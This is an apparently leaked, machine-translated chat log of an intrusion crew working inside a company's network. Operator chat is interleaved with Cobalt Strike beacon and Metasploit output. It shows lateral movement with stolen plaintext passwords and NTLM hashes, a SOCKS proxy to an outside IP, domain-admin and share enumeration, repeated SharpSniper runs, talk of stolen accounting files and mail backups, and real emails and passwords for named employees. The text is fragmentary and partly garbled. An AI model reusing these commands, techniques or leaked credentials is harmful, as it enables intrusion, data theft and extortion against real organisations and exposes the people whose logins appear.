``+ since there are 30k pk there is 100% exchange serverpk from the same group where rem sapp found check thisocgroup - OU=ocean or sabnet i would say subnet you mean subnet by group? 1 the group on satnets and users? webmordoy, satnets how so? mostly there satnets around 20a in their group?((almost 30kahahaha how many pc's in ad comps? + is there a point? smb_login have not tried it yesterday i tried to pull cars with it, not everything worked it did not roll in anywhere? yes, local``
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:295b43446eb7ee2c640e238481366061:::
``I don't think they went everywhere and changed it by the way this Remote Support is local as I rememberRemote Support did not find a new one? before the change of the password it was a long time ago he collected them[ ](https://mediaeveryone.com/group/snpartners-com?msg=uc5wJRzd5E7tPvt8h) and with these all? 10.51.128.230 on two subnets there is only one car with rdp is closed at them?
[*] 172.31.190.102:445 - Executing the command...
[*] 172.31.190.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl] ...
[-] 172.31.190.102:445 - Unable to execute specified command: Failed to bind. Could not bind to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.31.190.102[\svcctl]
[-] 172.31.190.102:445 - Unable to connect for cleanup: The server responded with an unexpected status code: STATUS_ACCESS_DENIED. Maybe you'll need to manually remove \WINDOWS\Temp\DmWDlRDmpcujzxcN.bat from the target.
[*] 172.31.190.102:445 - Scanned 1 of 1 hosts (100% complete)
``````
setg Proxies socks4:107.161.126.162:2914
``and give sockshmm[vvv some load on it now just psexec?[ ](https://mediaeveryone.com/group/snpartners-com?msg=9DgDeXLzLH2H9aMgo) psexec_command``.
beacon> shell wmic /node:172.31.190.100 /user:JDOSSN\nddevbernst /password:Tractor20! OS GET Name
[*] Tasked beacon to run: wmic /node:172.31.190.100 /user:JDOSSN\ndevbernst /password:Tractor20! OS GET Name
[+] host called home, sent: 114 bytes
[+] received output:
Node - 172.31.190.100

ERROR:

Description = The RPC server is unavailable.
``a vmik?``
beacon> shell net use * \\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20!
[*] Tasked beacon to run: net use *\\\172.31.190.100\C$ /user:JDOSSN\nddevbernst Tractor20!
[+] host called home, sent: 96 bytes
[+] received output:
System error 5 has occurred.

Access is denied.
1) without the \ at the end
2) with a direct quote
beacon> shell net use \\172.31.190.101!\C$\
[*] Tasked beacon to run: net use \\\172.31.190.101\C$\
[+] host called home, sent: 59 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``````
beacon> net share \\\172.31.190.101
[*] Tasked beacon to run net share on 172.31.190.101
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \172.31.190.101:

 Share name Comment
 ---------- -------
 ILPRARIESTATE_HD
 DHS_AVTEST
 WAWASHINGTON_HD
 WAWASHINGTON_EQARC
 TXSOUTH_HD
 TXSOUTH_EQARC
 TXRAYLEE_HD
 TXRAYLEE_EQARC
 TXQUALITY_HD
 TXQUALITY_EQARC
 TXBEPARTNERS_HD
 TXBEPARTNERS_EQARC
 TXAGPOWER_HD
 TXAGPOWER_EQARC
 TNRITCHIE_HD
 TNRITCHIE_EQARC
 TNGENERAL_HD
 Sybase_Shared
 SKMAPLEFARM_HD
 SKMAPLEFARM_EQARC
 SKJAYDEE_HD
 SKJAYDEE_EQARC
 SDGROSSENBURG_HD
 SDGROSSENBURG_EQARC
 SDAttachVol2
 SDAttachVol1
 rontest1$
 QuorumFileWitnessA
 profvol2
 profvol1
 OHLESLIE_HD
 OHLESLIE_EQARC
 OHFINDLAY_HD
 OHFINDLAY_EQARC
 NYZAHMANDMATSON_EQARC
 NYCAZENOVIA_HD
 NYCAZENOVIA_EQARC
 NMPECOS_HD
 NMPECOS_EQARC
 NESTUTHEIT_HD
 NEGREENLINE_HD
 NEGREENLINE_EQARC
 NDLEADING_HD
 NDLEADING_EQARC
 NDGRAFTON_HD
 NDGRAFTON_EQARC
 NDDAKOTA_HD
 NDDAKOTA_EQARC
 NCSOUTHEASTFARM_HD
 NCSOUTHEASTFARM_EQARC
 NBGREENDIAMOND_HD
 NBGREENDIAMOND_EQARC
 MX_Shared
 MTFRONTLINEAGSOL_HD
 MTFRONTLINEAGSOL_EQARC
 MTFRONTLINE_HD
 MTFRONTLINE_EQARC
 MOJFROLING_HD
 MOHORIZON_HD
 MNMANKATO_HD
 MNHAUG_HD
 MNHAUG_EQARC
 MITRICOUNTY_HD
 MITRICOUNTY_EQARC
 MIDANDG_HD
 MIDANDG_EQARC
 MexicoHomeDir
 KYLIMESTONE_HD
 KYLIMESTONE_EQARC
 KSAMERICAN_HD
 KSAMERICAN_EQARC
 Keys$
 JDISHomeDir
 JDIS_Shared
 JDIS_HD
 JDIS_EQARC
 ipc$
 ILSAMPLE_HD
 ILPRAIRIESTATE_HD
 ILPRAIRIESTATE_EQARC
 ILNEFF_HD
 ILNEFF_EQARC
 ILMARTINSULLIVAN_HD
 ILMARTINSULLIVAN_EQARC
 ILKELLYSAUDERR_HD
 ILKELLYSAUDERR_EQARC
 ILJDISINFRASOL_HD
 ILJDISEQUIP_HD
 ILJDISEQUIP_EQARC
 ILITECERTLOADTEST_HD
 ILITECERT_HD
 ILITECERT2_HD
 ILHOLLAND_HD-path
 ILHOLLAND_HD
 ILHOLLAND_EQARC
 ILHOGANWALKER_HD
 ILDEMO_HD
 ILCROSS_HD
 ILCROSS_EQARC
 ILCITRATEST_HD
 ILARENDSBROS_HD
 ILARENDSBROS_EQARC
 ILARENDSAWE_HD
 ILARENDSAWE_EQARC
 ILARENDSANDSONS_HD
 ILARENDSANDSONS_EQARC
 iaworkshopvol
 IAWORKSHOP_HD
 IAWORKSHOP_EQARC
 IASCHENKELBERG_EQARC
 IAPHELPS_HD
 IAPHELPS_EQARC
 IAHULTGREN_HD
 IABRAKKE_HD
 IABRAKKE_EQARC
 IABODENSTEINER_HD
 IABODENSTEINER_EQARC
 FLSMITH_HD
 FLSMITH_EQARC
 FLHOBO_HD
 FLDOBBS_HD
 FLDOBBS_EQARC
 drtest
 DLR_Shared2
 DLR_Shared1
 dhsrepo
 DETAYLOR_HD
 DETAYLOR_EQARC
 DealerConfig
 COMVEQUIPMENT_HD
 COHONNEN_HD
 COHONNEN_EQARC
 channel_enviroment_support
 CATHOMASON_HD
 CASANJOAQUIN_EQARC
 CALAWRENCE_HD
 CALAWRENCE_EQARC
 CAFRESNO_HD
 CAFRESNO_EQARC
 CACALCOAST_HD
 CACALCOAST_EQARC
 c$
 ARSWARK_HD
 ALSUNSOUTH_HD
 ALSUNSOUTH_EQARC
 admin$
``but these cars are NetAppuser7okenet use?``No userpod normal what do you mean? and user7 here too check the validity of the cradag.......
```
beacon> shell dir \\172.31.190.100\C$\ProgramData
[*] Tasked beacon to run: dir \\\172.31.190.100\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

beacon> shell dir \\172.31.190.101\C$\ProgramData
[*] Tasked beacon to run: dir \\172.31.190.101\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

beacon> shell dir \\172.31.190.102\C$\ProgramData
[*] Tasked beacon to run: dir \\172.31.190.102\C$\ProgramData
[+] host called home, sent: 66 bytes
[+] received output:
Access is denied.

``````
172.31.190.100:445 (platform: 500 version: 5.0 name: NDHSNASC9102 domain: JDOSSN)
 
172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
 
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
``````
[+] 172.31.190.100:445 - 172.31.190.100:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
 
[+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
 
[+] 172.31.190.102:445 - 172.31.190.102:445 - Success: 'JDOSSN\nddevbernst:Tractor20!' Administrator
``On a subnet with DK polzak on three machines admin, I'll try to knock, maybe there YES passed by@tl1
```
10.51.128.122:25 (220 10.51.128.122 ESMTP Sendmail 8.14.3/8.14.3; Fri, 23 Oct 2020 15:53:27 -0500)
10.51.128.122:21 (220 (vsFTPd 2.2.2))
```
any idea what to post here?
on vsFTPd only vsftpd_234_backdoor didn't work with 2.2.2
on SMTP not quite figured out with enum, there user_file is taken from local machine, but why it is taken - is not clear, in idea it must deduce users, which rotate there, and not check with entered by me, no?
smtp_ntlm_domain just works without output
for relay session in the msf need, but how to drop it there - no idea, 445 open, but the same dir says type network name not found

On webmords interesting found Avaya, tried knocking there with nddevbernst codes - did not work, with those above, from webroot - stood for about 20 minutes and I turned it off, so it did not show anything
It won't let me into the ciski, it just won't load.
[+] 10.51.128.199:445 - 10.51.128.199:445 - Success: 'JDOSSN\nddevbernst:Tractor20!

`` * Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc

 Result：
Tractor20!>sAMAccountName: nddevkodell
```
>memberOf: CN=NDLEADING_ISG,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SALES,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-SALES-RENTAL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local

``Kevin O'Dell
d33r31 !Well deactivated )
```
User name svc_BuildAutomator
Full Name EQBuildAutomator
Comment
User's comment
Country/region code 000 (System Default)
Account active No
Account expires Never

Password last set 10/20/2020 9:13:16 PM
Password expires Never
Password changeable 10/21/2020 9:13:16 PM

``and on those who ``were'' as well.
User name svc_snow_preprod
Full Name Service Now PreProd
Comment Service Now Preprod
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 10/19/2020 7:38:46 AM

``YeahPassword last set 10/21/2020 4:26:58 AM They probably got wind of it a couple days ago
they changed the passwords and removed most of the danes didn't fit the passwords that were in the beginning try to these accounts I built in the beginning``
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DHSAdmin jdodmp_svc
The command completed successfully.

``It gave me a different result, it's strange``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
a900221 AuditDB_svc AuditJDOSSNDA
DHSAdmin jdodmp_svc MPXAXDAgentAccount
PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom
svc_audit svc_BuildAutomator svc_exchange
svc_OMAA svc_OMDAS svc_OMREAD
svc_scomsql_2019 svc_snow_preprod
The command completed successfully.
UserName : jdodmp_svc
ComputerName : JDODC67.jdossn.local
SessionFrom : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin : False
¶¶ Well, the two domains admins)))) but fucking there are two:D so they took it, I say not ask for it
the password was set by some network admin it's LA passwords now we'll check it on all domains admins sure sure) ok yes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
``didn't understand the question I was admin sure стоит?попробуйjeremstew@gmx.com
1Qwerty1:::seclold I'm now with my card or you have an account without balance? there Purchase button should be there are credits on the accountpurchasevoneaFound.But this is a payment record. Purchase Get free credits on all? no one has been disconnected? Please wait up to 5 days. A notification email will be sent to youProst how many I've been there - always no luck):man_shrugging: )and why not check[ ](https://mediaeveryone.com/group/snpartners-com?msg=xLFzSBxBLKzgnqn7B) ?there by the way their passwords that are in hashes on kmd5 do not work? it's unlikely domain pass... but you could try it.
 https://www.gotomeeting.com/meeting/sign-in Presenter Login: blainee@leadingedgeequip.com Password: NDleading2020$
``no see liku look in citrix 2fatam 2faon there's an admin? o_o where is that from?
```
--- Chromium Credential (User: ndmicjsater) ---
URL : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726
``and cisco netswich did open)``and cisco opens on https? https://10.51.128.5 Cisco ASDM 7.1(2)ugh the fucking cloud karocha on it netapp is vindanas? ah, well where it LA there
`>operatingSystem: NetApp Release 8.3.2P7 `` I'll look it up straight "it" Well, I wrote above that there are on the servers LA, but he does not see the fs why then and that mmm for cars for between the chair and the monitor an empty coconut hangs on-call-aspects because they for techportaok, will dotakaya acke on the servers almost never rbaotayuta not on the servers?to the servers, all - and this is what they brute-force available hosts from other segments?
but i doubt that someone outside this segment(hmDa like yes, HP kinda lets in on the proxei switches are all mfu's?
I don't know the models by eye so) MFPs? 10.51.128.171 WORKGROUP\HPFEA60E [Win]
10.51.128.149 00-00-00-00-00 WORKGROUP\HPC67872 [Win]
10.51.128.122 00-80-91-CE-12-74 MFP13505140 [Win]
10.51.128.82 FC-3F-DB-4D-76-CB NPI4D76CB [Win?]
10.51.128.84 44-1E-A1-33-BA-C1 NPI33BAC1 [Win?]

do these hosts say anything?
on the workgroups try the local admin they have here on the network
You can also try to use your users... if it will start though unlikely some unknown cisco10.51.128.5 7C-69-F6-E6-2D-C1 [SSH-1.99-Cisco-1.25]you can set on brute force if lockout will not directly hydra under sockets on webforumtry webs on the switch admin/admin admin/password
i used a similar garbage and it didn't work for me) do you use this palm?
https://github.com/k8gege/Ladonони create the domains I guess...
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
```
switches...``
10.51.128.83 [NPIF68328] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401dne 10.51.128.83]
10.51.128.84 [NPI33BAC1] [Virata-EmWeb/R6_2_1] [HP LaserJet P2055dn 10.51.128.84]
10.51.128.3 [ ] [Gateway] [AT&amp;T VPN Gateway]
10.51.128.10 [ ] [] []

[+] received output:
10.51.128.62 [ ] [Embedthis-Appweb/3.4.2] []
10.51.128.61 [ ] [HTTPD] [Web managerment Home]
10.51.128.60 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]
10.51.128.64 [ ] [lighttpd] [HPE OfficeConnect Switch 1920S 48G 4SFP JL382A]

[+] received output:
10.51.128.144 [DESKTOP-CGJQ23A.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP LaserJet 400 M401n 10.51.128.144]
10.51.128.122 [MFP13505140] [Apache] [TopAccess--> <script language=javascript type=t]
10.51.128.148 [NPIB93D57.ndleading.jdossn.local] [Virata-EmWeb/R6_2_1] [HP Color LaserJet M452dn 10.51.128.148]
10.51.128.149 [HPC67872.ndleading.jdossn.local] [HP HTTP Server; HP PageWide Pro 577 MFP - D3Q21A; Serial Number: CN77RGY02F; Built: Tue Jan 03, 2017 11:01:43AM {MAHDWOPP1N001.1708D.00}] []
10.51.128.161 [BrightSign-42D8D2010516.ndleading.jdossn.local] [] [BrightSign&reg;]

[+] received output:
10.51.128.171 [HPFEA60E.ndleading.jdossn.local] [nginx] []
10.51.128.185 [NPI5D1B70] [Virata-EmWeb/R6_2_1] [HP Color LaserJet MFP M477fdw 10.51.128.185]

[+] received output:
10.51.128.200 [ ] [IPOffice/] [About IP Office R11.0]

I'm looking for it...they are not actually connected to the local network and communication with the domain goes through the iron...this is very common in retail...one of several offices is a separate division))
[+] 172.31.190.101:445 - 172.31.190.101:445 - Success: 'JDOSSN\ndmicjsater:aad3b435b51404eeaad3b435b51404ee:67595f137f7f5908e3ed202bc4b14aa9' Administrator
```
I found several servers where this guy is an admin, but I can't get ls
```
beacon> shell dir \\172.31.190.100\c$
[*] Tasked beacon to run: dir \\172.31.190.100\c$
[+] host called home, sent: 54 bytes
[+] received output:
Access is denied.
``They have their own separate dns to that fucking ndleadingDNS Suffix Search List. . . . . . . . .ndleading.jdossn.local.
                                       jdossn.local from the trusts is not pinging[ ](https://mediaeveryone.com/group/snpartners-com?msg=j4BcvMfjTAAExZCDP) is it their server subnet or can't see it?
dn:CN=DHSLAB.local,CN=System,DC=jdossn,DC=local
>whenCreated: 2020/06/03-07:40:09 Central Daylight Time
>name: DHSLAB.local
>securityIdentifier: S-1-5-21-1864881788-682989080-4277963046
>trustDirection: 1 [Inbound(1)
>trustPartner: DHSLAB.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``````
JDOSSN.LOCAL [172.31.216.12]

JDODC67.jdossn.local [172.31.190.47]

jdodc64.jdossn.local 172.31.190.11 172.31.190.10

-----------------------------

JDOSQL07.jdossn.local 172.31.190.190
I know about it and it's a dk which you can see here diap172.31.190.10:445 (platform: 500 version: 10.0 name: JDODC64 domain: JDOSSN)192.111.152.122:35475 vIbC1kLiaga
got it
access pj to cobalt where open sessions on these livewilma on them all have sessions? all, yes? candisofficew088726121926w0887260919js not in hell candyoffice is spelled so? candyofficedesktop-gcpb49aw08987712191w08987712192)) fuck, how do I ipac then look in hell ....10.0.220.138 hostnames buddy... hostnames...10,29,220,125 if there's a sqlsrv process anywhere - do a sqlcmd -Ljrkaroo
all hosts where you have access to give) nt authority system do not understand the question if you have LA - then there must be a SYSTEM no i mean that hosts where the system? i'm all hell myself will look further hostname enough so do not really need it nt servers there as i understood the system read? i will look something just hostnames is important Karoch
please send me a list of hosts where you have L.A. what machine?
what's its purpose? just a workstation or some becofis i don't know where the fuck you scanned from? all ranges? o_only portscan the range that is listed there i did so ping each sabinet select **.*.1open subnets.txt needed to get out) the ones that are from me even if not all. but it is not exact) but why did you look for them? they are all in subnets.txt which found I user9 subnets dumped pliz explain what is it?
10.29.220.0 users

10.51.128.0 users + admin

172.31.190.0 nas + servers

204.54.154.136 DA home subnet

172.31.216.0 servers

10.99.198.0

172.31.225.0

10.99.201.0 --

172.31.45.0

10.99.194.0

10.99.205.0

10.99.202.0

10.99.193.0

10.99.195.0

10.99.207.0

10.99.199.9

10.99.204.0

10.99.206.0
``Checked viam - backups on ehshekhety enough? this is from one listing + I'll look again, if I find something - I'll ask you 10 do not need 10 years old? backups of mail interesting a lot of office documents, presentations, reports all sorts. there are backups of mail, virtual machines - everything is old and in single copies.
	CROCKETSTORAGE
FRANCESTORAGE
GERMANYSTORAGE
HENDSTORAGE
INDYSTORAGE
MXSTORAGE
NVSTORAGE
OHSTORAGE
ORANGESTORAGE 10.1.8.8
POLSTORAGE
SHENZHENSTORAGE
SINGSTORAGE
SUPERDATA
SUZHOUSTORAGE
TXSTORAGE
VASTORAGE
```
is it only in rtpy they have one garbage? there are about 20 servers? there is nothing valuable in it?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=yb2NEKF9yY9ioHELz) there is a real garbage. since 2006, or+ you can and esx given with valuable infofile garbage only on backup servers the same file listings as on skulenewe mean esx? the backup server listings are
backup 1 skool server
skool listings up to level 7
accounting files stolen
backup 1 mail YES
access to ecx

correct me if i missed that + it's files and listings skuljes no listings also check the presence of this crap from the eex and found passwords took away only one had something significant i only servaky here about browserswaterway was on some in another network even in another domain did not collect them before? avec yes i checked on different let go why should i have the second?
if it didn't work the first time
beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Angel Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Angel Administrator j@mez9olk
[+] host called home, sent: 113765 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe bbuerck Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe bbuerck Administrator j@mez9olk
[+] host called home, sent: 113769 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe canceleta Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe canceleta Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe DHaase Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe DHaase Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe orgbarracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe orgbarracuda Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Uptime Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Uptime Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe adonixadmin Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe adonixadmin Administrator j@mez9olk
[+] host called home, sent: 113777 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe barracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe barracuda Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe BGW Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe BGW Administrator j@mez9olk
[+] host called home, sent: 113761 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe cevansa Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe cevansa Administrator j@mez9olk
[+] host called home, sent: 113769 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe EntAdmin Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe EntAdmin Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe sagert Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe sagert Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe veeam Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe veeam Administrator j@mez9olk
beacon>
[-] Unknown command:
[+] host called home, sent: 113765 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe alloyamms Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe alloyamms Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe BarracudaBUP Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe BarracudaBUP Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe CAncelet Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe CAncelet Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe citrix_svc Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe citrix_svc Administrator j@mez9olk
[+] host called home, sent: 113775 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe gahbarracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe gahbarracuda Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Services_Backup Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Services_Backup Administrator j@mez9olk
beacon>
[-] Unknown command:
[+] host called home, sent: 113785 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe wstangea Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe wstangea Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Administrator Administrator j@mez9olk
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

``The rest? Change your password.
luqdztoszgtqucubfv@upived.online
asdergIJW3RETmjite453
``the account from mega where? everything is ready? have you checked the admins browsers for access there? Sage - accountanthttp://www.scribd.com/document/341656824/Sage-X3-User-Guide-REF-Shipping-Interface-SHPSYS-User-Setup-V6-pdfклиент asus may be portablx. some kind of alternative skullDisplayName : Sage X3 Base Sql Server V6 X3V6
what is it?
====== InstalledProducts ======

  DisplayName : Adobe Flash Player 32 ActiveX
  DisplayVersion : 32.0.0.465
  Publisher : Adobe
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Kaseya Agent (alloysql01.servers.alloy - 10.89.11.24)
  DisplayVersion : 9.5.0.18
  Publisher : Kaseya
  InstallDate : 7/27/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Report Viewer Redistributable 2008 SP1
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Safe X3 ADXADMIN
  DisplayVersion : 11.07.0002
  Publisher : Sage
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : PFA Server Registry Update
  DisplayVersion : 1.0.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP ProLiant PCI-express Power Management Update for Windows
  DisplayVersion : 1.3.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Compact 3.5 SP2 ENU
  DisplayVersion : 3.5.8080.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP System Management Homepage
  DisplayVersion : 6.3.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Headless Server Registry Update
  DisplayVersion : 1.0.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual Studio Tools for Applications 2.0 - ENU
  DisplayVersion : 9.0.35191
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946040)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946308)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946344)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947540)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947789)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : HP Version Control Agent
  DisplayVersion : 6.3.0.870
  Publisher : Hewlett Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server 2008 R2 Books Online
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : SEI Central Point For SQL Server And Oracle - Setup
  DisplayVersion : 7.0.0
